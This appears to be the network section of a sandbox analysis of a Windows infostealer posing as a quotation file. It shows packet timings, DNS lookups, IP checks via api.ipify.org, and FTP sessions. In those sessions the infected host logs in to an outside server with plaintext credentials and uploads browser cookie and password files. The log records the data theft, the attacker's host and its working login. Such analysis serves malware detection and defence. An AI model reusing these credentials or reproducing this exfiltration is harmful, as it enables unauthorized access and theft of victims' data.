                                      Sep 27, 2024 13:12:55.143568039 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:55.714776993 CEST4977921192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:55.719839096 CEST2149779110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:55.720567942 CEST4977921192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:55.720567942 CEST4977921192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:55.725646973 CEST2149779110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:55.731033087 CEST4977921192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.066729069 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.071171999 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.076201916 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.076231003 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.076256990 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.076370001 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.076397896 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.076401949 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.076445103 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.076457977 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.076472044 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.076502085 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.076549053 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.076575041 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.076584101 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.076605082 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.076725006 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.081594944 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.081624031 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.081671000 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.081698895 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.081724882 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.081751108 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.081777096 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.081778049 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.081798077 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.081825018 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.081836939 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.081851006 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.081873894 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.081907034 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.081923008 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.081984043 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.082031012 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.082058907 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.082081079 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.082916975 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.086818933 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.086847067 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.086941004 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.086987972 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.087018013 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.087100029 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.087146044 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.087172031 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.087218046 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.087244034 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.087830067 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.088073015 CEST5862049778110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:56.094624996 CEST4977858620192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.156761885 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:56.997684002 CEST2149777110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:57.115677118 CEST4977721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:57.608388901 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:57.613449097 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:57.973038912 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:57.976418018 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:57.981611013 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:57.981709003 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:57.981863976 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:57.986726999 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.811820030 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.812227964 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.817228079 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.817259073 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.817286968 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.817336082 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.817394972 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.817423105 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.817450047 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.817456961 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.817481995 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.817507029 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.817531109 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.817537069 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.817564011 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.817590952 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.817620993 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.817627907 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.817706108 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.822483063 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.822547913 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.822565079 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.822613001 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.822617054 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.822640896 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.822666883 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.822668076 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.822695017 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.822701931 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.822731018 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.822757006 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.822765112 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.822793007 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.822839975 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.822855949 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.822866917 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.822895050 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.822920084 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:58.822979927 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.823007107 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.827539921 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.827780008 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.827832937 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.827999115 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.828028917 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.828079939 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.828107119 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.828152895 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.828177929 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.828376055 CEST5740649780110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:58.828430891 CEST4978057406192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:59.053177118 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:12:59.608923912 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:12:59.741053104 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:15.246606112 CEST4978121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:15.253818989 CEST2149781110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:15.255680084 CEST4978121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:15.255680084 CEST4978121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:15.261090040 CEST2149781110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:15.267432928 CEST4978121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:26.072145939 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:26.077079058 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:26.452203989 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:26.452831984 CEST4978251546192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:26.460716009 CEST5154649782110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:26.460778952 CEST4978251546192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:26.460886002 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:26.466106892 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:27.453784943 CEST2149737110.4.45.197192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2024 13:10:02.280484915 CEST | 62984 | 53 | 192.168.2.4 | 1.1.1.1
Sep 27, 2024 13:10:02.308217049 CEST | 53 | 62984 | 1.1.1.1 | 192.168.2.4
Sep 27, 2024 13:10:06.803459883 CEST | 61284 | 53 | 192.168.2.4 | 1.1.1.1
Sep 27, 2024 13:10:07.075886011 CEST | 53 | 61284 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 27, 2024 13:10:02.280484915 CEST | 192.168.2.4 | 1.1.1.1 | 0xafb2 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Sep 27, 2024 13:10:06.803459883 CEST | 192.168.2.4 | 1.1.1.1 | 0xd8ab | Standard query (0) | ftp.haliza.com.my | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 27, 2024 13:10:02.308217049 CEST | 1.1.1.1 | 192.168.2.4 | 0xafb2 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 13:10:02.308217049 CEST | 1.1.1.1 | 192.168.2.4 | 0xafb2 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 13:10:02.308217049 CEST | 1.1.1.1 | 192.168.2.4 | 0xafb2 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 13:10:07.075886011 CEST | 1.1.1.1 | 192.168.2.4 | 0xd8ab | No error (0) | ftp.haliza.com.my | | 110.4.45.197 | A (IP address) | IN (0x0001) | false

                                      • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49733 | 104.26.12.205 | 443 | 2756 | C:\Users\user\Desktop\rQuotation3200025006.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 11:10:03 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-09-27 11:10:03 UTC | 211 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 11:10:03 GMT
    Content-Type: text/plain
    Content-Length: 11
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8c9b0b8a0a530f69-EWR
2024-09-27 11:10:03 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
    Data Ascii: 8.46.123.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49740 | 104.26.12.205 | 443 | 7616 | C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 11:10:13 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-09-27 11:10:13 UTC | 211 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 11:10:13 GMT
    Content-Type: text/plain
    Content-Length: 11
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8c9b0bc51fd70f63-EWR
2024-09-27 11:10:13 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
    Data Ascii: 8.46.123.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49748 | 104.26.12.205 | 443 | 8012 | C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 11:10:20 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-09-27 11:10:21 UTC | 211 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 11:10:20 GMT
    Content-Type: text/plain
    Content-Length: 11
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8c9b0bf08c9943ed-EWR
2024-09-27 11:10:21 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
    Data Ascii: 8.46.123.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49755 | 104.26.12.205 | 443 | 7188 | C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 11:10:27 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-09-27 11:10:27 UTC | 211 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 11:10:27 GMT
    Content-Type: text/plain
    Content-Length: 11
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8c9b0c1d38730f78-EWR
2024-09-27 11:10:27 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
    Data Ascii: 8.46.123.33


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Sep 27, 2024 13:10:08.907953024 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 5 of 50 allowed.
    220-Local time is now 19:10. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
Sep 27, 2024 13:10:08.908003092 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 5 of 50 allowed.
    220-Local time is now 19:10. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
Sep 27, 2024 13:10:08.908032894 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 5 of 50 allowed.
    220-Local time is now 19:10. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
Sep 27, 2024 13:10:08.908216000 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | USER origin@haliza.com.my
Sep 27, 2024 13:10:09.235133886 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 331 User origin@haliza.com.my OK. Password required
Sep 27, 2024 13:10:09.235284090 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | PASS JesusChrist007$
Sep 27, 2024 13:10:09.609087944 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 230 OK. Current restricted directory is /
Sep 27, 2024 13:10:09.939069033 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 504 Unknown command
Sep 27, 2024 13:10:09.942521095 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | PWD
Sep 27, 2024 13:10:10.269857883 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 257 "/" is your current location
Sep 27, 2024 13:10:10.270051003 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | TYPE I
Sep 27, 2024 13:10:10.596981049 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 200 TYPE is now 8-bit binary
Sep 27, 2024 13:10:10.599124908 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | PASV
Sep 27, 2024 13:10:10.925662041 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,209,190)
Sep 27, 2024 13:10:10.933353901 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | STOR CO_Chrome_Default.txt_user-849224_2024_09_27_08_10_04.txt
Sep 27, 2024 13:10:11.762018919 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
Sep 27, 2024 13:10:12.151508093 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred
    226 0.389 seconds (measured here), 8.42 Kbytes per second
Sep 27, 2024 13:10:12.152465105 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | PASV
Sep 27, 2024 13:10:12.479223013 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,210,26)
Sep 27, 2024 13:10:12.484707117 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | STOR CO_Firefox_fqs92o4p.default-release.txt_user-849224_2024_09_27_14_38_12.txt
Sep 27, 2024 13:10:13.321419954 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
Sep 27, 2024 13:10:13.884481907 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 226 File successfully transferred
Sep 27, 2024 13:10:13.885103941 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 226 File successfully transferred
Sep 27, 2024 13:10:15.600683928 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 6 of 50 allowed.
    220-Local time is now 19:10. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
Sep 27, 2024 13:10:15.600987911 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 | USER origin@haliza.com.my
Sep 27, 2024 13:10:15.931091070 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 331 User origin@haliza.com.my OK. Password required
Sep 27, 2024 13:10:15.935343027 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 | PASS JesusChrist007$
Sep 27, 2024 13:10:16.301481962 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 230 OK. Current restricted directory is /
Sep 27, 2024 13:10:16.631720066 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 504 Unknown command
Sep 27, 2024 13:10:16.631902933 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 | PWD
Sep 27, 2024 13:10:16.961774111 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 257 "/" is your current location
Sep 27, 2024 13:10:17.045949936 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 | TYPE I
Sep 27, 2024 13:10:17.376188993 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 200 TYPE is now 8-bit binary
Sep 27, 2024 13:10:17.382038116 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 | PASV
Sep 27, 2024 13:10:17.711987972 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,208,86)
Sep 27, 2024 13:10:17.718048096 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 | STOR PW_user-849224_2024_09_27_07_10_13.html
Sep 27, 2024 13:10:19.570696115 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
Sep 27, 2024 13:10:19.570862055 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
Sep 27, 2024 13:10:19.571049929 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
Sep 27, 2024 13:10:19.571302891 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
Sep 27, 2024 13:10:19.901110888 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred
    226 1.341 seconds (measured here), 258.03 bytes per second
Sep 27, 2024 13:10:20.202588081 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 | PASV
Sep 27, 2024 13:10:21.281092882 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,234,56)
Sep 27, 2024 13:10:21.284106016 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,234,56)
Sep 27, 2024 13:10:21.284137011 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,234,56)
Sep 27, 2024 13:10:21.341022015 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 | STOR CO_Chrome_Default.txt_user-849224_2024_09_27_13_38_41.txt
Sep 27, 2024 13:10:22.180212975 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
Sep 27, 2024 13:10:22.513676882 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred
    226 0.334 seconds (measured here), 9.82 Kbytes per second
Sep 27, 2024 13:10:22.516904116 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 | PASV
Sep 27, 2024 13:10:22.701957941 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 8 of 50 allowed.
    220-Local time is now 19:10. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
Sep 27, 2024 13:10:22.702133894 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 | USER origin@haliza.com.my
Sep 27, 2024 13:10:22.847029924 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,254,162)
Sep 27, 2024 13:10:22.852849007 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 | STOR CO_Firefox_fqs92o4p.default-release.txt_user-849224_2024_09_27_16_16_58.txt
Sep 27, 2024 13:10:23.032072067 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 331 User origin@haliza.com.my OK. Password required
Sep 27, 2024 13:10:23.032488108 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 | PASS JesusChrist007$
Sep 27, 2024 13:10:23.385102034 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 230 OK. Current restricted directory is /
Sep 27, 2024 13:10:23.682950020 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
Sep 27, 2024 13:10:23.715152979 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 504 Unknown command
Sep 27, 2024 13:10:23.715291977 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 | PWD
Sep 27, 2024 13:10:24.018543005 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 226 File successfully transferred
Sep 27, 2024 13:10:24.044948101 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 257 "/" is your current location
Sep 27, 2024 13:10:24.045090914 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 | TYPE I
Sep 27, 2024 13:10:24.374522924 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 200 TYPE is now 8-bit binary
Sep 27, 2024 13:10:24.374686003 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 | PASV
Sep 27, 2024 13:10:24.704941034 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,201,41)
Sep 27, 2024 13:10:24.710805893 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 | STOR PW_user-849224_2024_09_27_07_10_21.html
Sep 27, 2024 13:10:25.537411928 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
Sep 27, 2024 13:10:25.868066072 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred
    226 0.331 seconds (measured here), 1.02 Kbytes per second
Sep 27, 2024 13:10:25.892936945 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 | PASV
Sep 27, 2024 13:10:26.223146915 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,255,81)
Sep 27, 2024 13:10:26.228996992 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 | STOR CO_Chrome_Default.txt_user-849224_2024_09_27_12_59_12.txt
Sep 27, 2024 13:10:27.066812992 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
Sep 27, 2024 13:10:29.133990049 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 8 of 50 allowed.
    220-Local time is now 19:10. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
Sep 27, 2024 13:10:29.134206057 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | USER origin@haliza.com.my
Sep 27, 2024 13:10:29.461889982 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 331 User origin@haliza.com.my OK. Password required
Sep 27, 2024 13:10:29.462064028 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | PASS JesusChrist007$
